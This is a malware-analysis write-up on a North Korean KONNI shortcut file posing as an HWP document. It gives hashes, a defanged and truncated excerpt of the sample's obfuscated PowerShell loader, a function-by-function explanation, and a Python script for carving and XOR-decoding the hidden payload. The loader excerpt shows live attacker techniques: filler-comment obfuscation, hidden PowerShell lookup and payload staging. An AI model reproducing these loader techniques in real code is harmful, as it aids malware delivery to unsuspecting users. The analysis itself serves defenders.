Malware made by North Korea's KONNI: 가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk (2025.1.23)
Today we look at a piece of malware made by the North Korean hacking group KONNI, the shortcut file 가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk (2025.1.23). The name is built to pass for a Korean HWP presentation deck on a virtual-asset service provider inspection plan; the real extension is .lnk, which Windows Explorer never displays for shortcut files, so the victim sees what looks like an .hwp document.
File name: 가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk.lnk
Size: 353,581,378 bytes (about 337 MiB; a genuine shortcut is normally a few kilobytes, so a .lnk of this size is itself anomalous and points to padding appended after the shortcut structure)
MD5: e37c8f6aba686aab3d7ecedbd1d0ef43
SHA-256: 5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892
PowerShell code embedded in the malware (taken from the LNK string data; the listing is reproduced as the author defanged it, so bracketed characters such as (.) and (o) break up keywords and are not part of the script, while the <# ... #> block comments are filler that PowerShell ignores)
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^| findstr /i rshell(.)exe') do (if exist "%f" (%f "
functi(o)n float{param($vacuum); <#vindicate healing#>$wedge = $vacuum(.)substring(0,$vacuum.length-4) + ''; <#bringing stirring#>return $wedge;};
function (p)ort{param($canon);<#face lack#> remove-item <#pressure scorn(#)> -path $c(a)non <#compensation soil#> -force;};
function pompous{param($wear,$interior,$unusual,$knot(,)$stupidity);
    <#houn(d) slight#> $wheat=New-Object (S)ystem.IO.FileStream(<#provision resemble#>$wear,<#abundant olfactory#>[System.IO.FileMode]::Open,<#apron vanity#>[System.IO.FileA(c)cess]::Read);
    <#transient liberty#> $wheat(.)Seek(<#associated distant#>$interior,[System(.)IO.SeekOrigin]::Begin);
    <#aside wooden#> $border=$(u)nusual*0x01;
    <#vault porce(l)ain#> $willow=N(e)w-Object byte[] <#landscape fright#>$unusual;
    <#ingredient judge#> $coat=New-Object byte[] <#concrete retard#>$border;
    <#access saturate#>$wheat(.)Read(<#rare flash(i)ng#>$coat,0,<#wild residence#(>)$border); $wheat.C(l)ose();
    $park=0;whi(l)e($park -lt $unu(s)ual){<#cul(t)ivate stroke#>$willow[$park]=$coat[$park*0x01] -bxor $knot;$park++;}
    <#rifle purchase#> set-content $stupidity <#coupling litter#> $willow -Encoding <#create healthy#> Byte;};
(f)unction incorrect{param($condition, $bubble);<#edible situated#> expand $condition <#inquire mute#> -F:* $bubble;};
function intricate{($)sport = $env:pub(l)ic <#capacity confession#> + '\' +<#w(o)lf favorite#> 'docu'(+)'men'(+)'ts';<#civil warfare#> return $sport;};
f(u)nction magnesia{param($looking); <#series estimation#>$transmit = Split-Path $looking;<#composition spit#> return $transmit;};
function (i)mperfect{return Get-Location;};
function central{<#signify suspension#>return $env:Temp;};
function thrush{$reproach = imperfect; $shifting = s(e)vere -steady $reproach; <#tas(t)e path#>if($shifting.length -eq 0) {$reproach = central; <#obscene stupidity#>$shifting …
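Reading past the filler, the visible part of the script does the following. The `for /f ... dir /s /b ... findstr /i rshell.exe` loop locates powershell.exe under System32\WindowsPowershell without the string "powershell" ever appearing in the command line. `float` drops the last four characters of a path (the extension); `port` deletes a file; `pompous` opens a file, seeks to an offset, reads a fixed number of bytes, XORs every byte with a single-byte key and writes the result out with `set-content -Encoding Byte` (the `*0x01` multipliers are no-ops, there only to pad the expression); `incorrect` runs `expand -F:*` on a file, i.e. extracts a Microsoft Cabinet; `intricate`, `magnesia`, `imperfect`, `central` and `thrush` resolve the drop directory (%PUBLIC%\documents, %TEMP%) and the shortcut's own location. The offset, length and key handed to `pompous` sit in the truncated part of the command line and are not shown on this page. The Python below is an added analysis example, not code from this post or from the sample: it strips the `<# ... #>` filler the way a deobfuscator would and reimplements the `pompous` carve-and-XOR step so the embedded payload can be pulled out of the oversized .lnk on an analysis machine instead of letting the shortcut run. The script fragment, the container bytes, and the offset and key used in `demo()` are all constructed; function names such as `carve_xor_payload` are my own.

```python
import re

# PowerShell treats <# ... #> as a block comment, so the script can scatter them
# between tokens as filler without changing behaviour. Non-greedy, DOTALL so a
# comment that extraction wrapped across lines is still matched whole.
JUNK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Constructed fragment of the 'pompous' function with the author's defanging
# removed and the filler comments left in. NOT copied from the sample.
SCRIPT_FRAGMENT = (
    "function pompous{param($wear,$interior,$unusual,$knot,$stupidity);"
    "<#hound slight#> $wheat=New-Object System.IO.FileStream(<#provision resemble#>$wear,"
    "<#abundant olfactory#>[System.IO.FileMode]::Open,<#apron vanity#>[System.IO.FileAccess]::Read);"
    "<#transient liberty#> $wheat.Seek(<#associated distant#>$interior,[System.IO.SeekOrigin]::Begin);}"
)


def strip_junk_comments(script: str) -> str:
    """Remove <# ... #> filler and collapse the whitespace it leaves behind."""
    cleaned = JUNK_COMMENT.sub("", script)
    return re.sub(r"[ \t\r\n]+", " ", cleaned).strip()


def carve_xor_payload(container: bytes, offset: int, length: int, key: int) -> bytes:
    """Python equivalent of the script's 'pompous' function: read `length` bytes
    at `offset` from the container and XOR each byte with the one-byte `key`.
    The script's `*0x01` multipliers are identity operations and are dropped."""
    if not 0 <= key <= 0xFF:
        raise ValueError("pompous XORs with a single byte; key must be 0..255")
    if offset < 0 or length <= 0:
        raise ValueError("offset must be >= 0 and length > 0")
    chunk = container[offset:offset + length]
    if len(chunk) != length:
        raise ValueError("container is shorter than offset + length")
    return bytes(b ^ key for b in chunk)


def looks_like_cab(data: bytes) -> bool:
    """The decoded blob is fed to `expand -F:*`, so a correct (offset, length, key)
    triple should produce a Microsoft Cabinet file, whose magic is b'MSCF'."""
    return data[:4] == b"MSCF"


def build_constructed_container(payload: bytes, offset: int, key: int) -> bytes:
    """Constructed stand-in for the padded .lnk (not the real sample): `offset`
    bytes of deterministic junk, the XOR-encoded payload, then a short tail."""
    padding = bytes((i * 131 + 7) & 0xFF for i in range(offset))
    encoded = bytes(b ^ key for b in payload)
    return padding + encoded + b"\x00" * 32


def demo() -> dict:
    """Run both steps on constructed data; offset and key are made up here
    because the real values sit in the truncated part of the command line."""
    cleaned = strip_junk_comments(SCRIPT_FRAGMENT)
    payload = b"MSCF" + bytes(44) + b"constructed cabinet body"
    offset, key = 0x1000, 0x5A
    container = build_constructed_container(payload, offset, key)
    carved = carve_xor_payload(container, offset, len(payload), key)
    return {
        "cleaned": cleaned,
        "container": container,
        "payload_len": len(payload),
        "carved": carved,
        "is_cab": looks_like_cab(carved),
    }


if __name__ == "__main__":
    result = demo()
    print(result["cleaned"])
    print("carved %d bytes, cabinet magic present: %s" % (len(result["carved"]), result["is_cab"]))
```

On a real sample the three values for `carve_xor_payload` come from the rest of the command line once the filler is stripped; `looks_like_cab` is the quick sanity check that the triple was read correctly, since the script's next step is `expand`, which only works on a cabinet.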
IoC
MD5: e37c8f6aba686aab3d7ecedbd1d0ef43
SHA-256: 5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892